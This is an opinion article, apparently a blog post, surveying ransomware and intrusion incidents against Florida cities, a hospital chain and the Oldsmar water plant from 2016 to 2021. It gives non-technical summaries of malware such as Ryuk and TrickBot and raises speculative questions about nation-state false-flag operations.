In the world of cyber defense, there are three main culprits to any cyber attack. First are those who conduct cyber attacks for money. These are classic cyber criminals and gangs who are often guilty of ransomware attacks. Second are hacktivists, who often conduct cyber attacks for political reasons. Third, are nation states, who conduct cyber warfare for sometimes more explicit, and sometimes more covert means.
Florida since 2016 has seen a peculiar rise in cyber attacks, specifically on municipalities. Most of these attacks go under reported and are attributed to cyber criminals. The lack of media these attacks have received is incredibly dangerous to say the least. The attribution of these attacks to mere cyber bullies waters down the seriousness of these situations. The following short report is meant to inform the reader of the current cyber landscape in Florida and to make them question the above narratives.
February 2016, Sarasota, FL: no ransom(unpaid) Type: Phishing(Locky)
May 2018, Palm Springs, FL: $1,200 ransom(paid) Type: Amnesia 3
December 2018, Collier County, FL: $184,000 ransom(paid) Type: Phishing
May, 2019 Riveria Beach, FL: $600,000 ransom(paid) Type: Not Reported
June 10th 2019 Lake City, FL: $485,000 ransom(paid) Type: Triple Threat(Ryuk)
June 2019 Key Biscayne, FL: $600,000 ransom(paid)Type: Triple Threat(Ryuk)
August 2019 — Naples, FL: $700,000 ransom(paid) Type: Phishing
December 2019 — Pensacola, FL: Ransome? Type: Maze
September 2020 — Universal Health Services: Ransome? Type: Phishing(Ryuk)
January/Feruary 2021 — Oldsmar Water Treatment Facility Type: Unknown
Sarasota, Florida: The Testing Grounds
160,000 city files encrypted and a demand of $33 million worth of Bitcoin to get them back. It could have been worse, but a quick decision to literally pull the plug on the governments network saved further data loss. The attack happened in February of 2016, but was only disclosed six months later.
The Sarasota attack was not random. The FBI disclosed to the city that a photo with the city’s email system was discovered in a propaganda video by the Islamic State. The Islamic State was not the only adversary probing Sarasota’s systems. A few months later a city employees entire email inbox was hit with a public records request from an account using a Russian based server.
This attack was the first time a Florida municipality had been targeted by not one, but two international adversaries. Why Sarasota was attacked specifically is not clear, but what is clear is that from this attack onward Florida has experienced an increase in ransomware style attacks.
Attack Resurgence: Palm Springs, Florida 2018
An Amnesia 3 phishing attack hit Palm Springs, Florida in May of 2018 marking a resurgence in ransomwares activity in the State. Since Sarasota Florida has been hit with various types of attacks. This Palm Springs attack would be the first of many attacks to begin targeting the Sunshine State and its many municipalities.
Having happened near the middle of 2018, the Palm Springs attack set off a chain of over 5 different attacks, most of which took place in 2019. Each attacked municipality had similar experiences, but not every cyber attack was the same.
Ryuk, the most commonly used attack, is targeted ransomware originally linked to the North Korean “Lazarus” threat group. According to reports, it appears to have been adopted by non-state criminal ransomware operators as well. It comes with a tailored ransom note that directs victims to contact the attacker via email. It has been known to lie dormant for up to a year before executing.
A Triple Threat attack, (Lake City & Riveria Beach)which are described in an April report by Cybereason, is malicious document that uses PowerShell script to download the Emotet trojan. Emotet has been used in the past to steal banking information, but it can also be used as a “dropper” to install additional malware — in this case, the TrickBot trojan.
TrickBot(Key Biscayne) is another piece of commodity malware. A modular bit of nastiness, TrickBot carries with it a number of tools for moving laterally across the network from the initial point of compromise — the computer of the person who clicked on the attachment. Those modules include password grabbers, a PowerShell-based reconnaissance tool that uses the open sourced PowerShell Empire framework, and spreader_x64.dll — a lateral movement tool based on the leaked National Security Agency EternalBlue vulnerability in Windows’ Server Message Block version 1 (SMB v. 1) file sharing protocol. Spreader_x64.dll also includes the well-worn mimikatz credential-stealing tool, allowing it to harvest credentials to copy itself if it can’t exploit EternalBlue.
Once TrickBot has established itself, the attackers use TrickBot to examine where their malware has landed and determine a next step. From there, they use any credentials that have been harvested to infect other systems. In an attack examined by Cybereason, TrickBot was used to compromise a Windows domain controller, gather data on the victim’s Active Directory structure, identify servers on the network, connect to them, and then infect them all with Ryuk.
The question to ask is, who is doing this, and why? The assumption by every article I have read is that these are bad criminal actors. But what if they aren’t? What if these are nation states disguising themselves as criminal actors? Are these False Flag? Further, what if these city data bases aren’t the real target after all? Sure, taking a hold of a city’s or hospital’s data is hostile in and off itself, but what if this serves as a larger distraction for a more in-depth cyber attack? One that won’t expose itself until it is too late?
“False flags in the cyberspace as significantly different and much easier to carry out than in the physical world. Cyber false flags refer to tactics applied by cunning perpetrators in covert cyber attacks to deceive or misguide attribution attempts including the attacker’s origin, identity, movement, and exploitation. It is typically very hard to conclusively attribute cyber attacks to their perpetrators and misdirection tactics can cause misattribution (permitting response and counterattack, which can lead to retaliation against the wrong party.
The goal of any false flag is two fold: 1) To misguide investigators from whoever the real perpetrator is 2) To potentially stick the blame on some other third party. On a nation state level, incorrect attribution of a cyber attack can be catastrophic. Although war policy has not caught up to the cyber realm, accusing a nation state of a detrimental hack could be very close to a statement of war.
If you recall the Sarasota attack, one of the key indicators of foreign action was a Russian based server. The question becomes, was this really a Russian based server, or was this a false flag?
On The Verge Of Causality
On September 29th, 2020, Universal Health Services, which has multiple branches in Florida, was victim of a cyber attack (another Ryuk attack).
“One anonymous user said the attack occurred around 2AM on Sunday morning. The attack began shutting down systems in the emergency department, quickly proliferating across the network. It appears antivirus was disabled by the attack, and hard drives lit up with activity before all computers shutdown. UHS IT teams directed staff to keep the computers offline.”
Shutting down a few hospitals in a localized region is enough to cause a crises. Shutting down a few hospitals during a flu season, a pandemic, or in a case of biological warfare, is enough to cause mass causalities through a variety of network effects.
At a press conference in February 2021, local officials in Tampa Bay announced that someone had infiltrated the computer systems that controlled Oldsmar’s water treatment plant and increased the level of lye, or sodium hydroxide, in the water by a factor of 100. This amount of lye would have effectively poisoned the water supply.
Some sort of third party “took control of the mouse, directed it to the software that controls water treatment, worked inside it for three to five minutes and increased the amount of sodium hydroxide from 100 parts per million to 11,100 parts per million.”
“The public was never in danger,” Pinellas County Sheriff Gualtieri said of the incident.
Are We Prepared?
With each cyber intrusion, there is a public official, public servant, IT Professional, or spokes person reintegrating the integrity of the current system and there efforts to fix it. This is understandable in many regards.
First, the public still does not fully understand the physical ramifications of cyber attacks. Documentaries about Stuxnet are cool and informative, but focus on big government and military involvement. Your local government getting money stolen is awful, but does not change your day to day. However, we are finally moving beyond that.
“Our systems are down, we can not get your lab results at this time,” are not encouraging words for someone whose life depends on said lab result. The Oldsmar attack would have been very real to an entire population of people had the attack succeeded. To imagine an attack on our healthcare system in coordination with an Oldsmar style attack can only trigger the worst in ones imagination.
Voting is the hottest topic when it comes to cyber security, placing it at the forefront. This has caused the political class and overall public to over look the decaying cyber infrastructure that could effect their very lives as soon as tomorrow, to even right now. My assumption when I finish writing this article is that when I stand up to go fill my cup with water from my fridge, that that water will hydrate me, not kill me. My hope is that I can continue to assume.
Read More Here
Written by Samuel Armes